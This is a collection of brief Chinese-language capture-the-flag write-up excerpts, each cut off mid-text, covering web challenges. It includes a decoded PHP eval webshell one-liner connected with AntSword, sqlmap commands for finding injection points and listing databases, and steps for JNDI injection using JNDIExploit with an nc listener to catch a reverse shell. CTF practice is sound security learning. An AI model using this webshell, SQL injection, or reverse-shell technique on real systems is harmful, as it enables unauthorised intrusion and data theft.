打开网站看到一个输入框查看源代码发现很明显的加密解密得到将p1和p2合并起来，得到flagflag{879c01056e0322a95bd18220e2aadc3a}

打开网址，发现被混淆了这，百度了很久，终于找到一篇关于解码混淆的文章https://www.52pojie.cn/thread-1074918-1-1.html搞了很久解出来得到<?phphighlight_file(__FILE__);@eval($_POST[ymlisisisiook]);?>用蚁剑链接发现只能再html目录下晃悠，写个phpinfo查看一下环境信息发现很多函数被

打开看到一个登录框。提示是命令执行，但这个框，怎么也不像有命令执行的呀看评论发现有注入，用sqlmap跑一下，正好回顾一下命令。python sqlmap.py -r sql.txt --level 5 --batch–batch //选项不询问，全部按照默认得到注入点，跑数据库python sqlmap.py -r web37.txt --dbs --hex，这里要很久跑完的时候忘记截图，直接关

下载打开。只有一个dat文件而dat文件一般有两种主要格式，一是纯文本文件，类似于txt，可用记事本打开，二是多媒体影像文件，可用KMPlayer、PotPlayer、腾讯视频等等媒体软件打开。这里直接用工具解就好了...

一，准备环境有VPS即可二，题解1，根据提示，/bin/bash：x，带x的是无法执行的(包括base64编码)，打勾的是可以执行的2，注意首先VPS上要装有java环境和工具，这里我用的是JNDIExploit-1.2-SNAPSHOT.jar2.2vps先允许反弹shell用到的端口2.3，再启动工具2.4，再开一个窗口监听nc2.5，构造payload，根据提示进行利用将地址改为自己的vps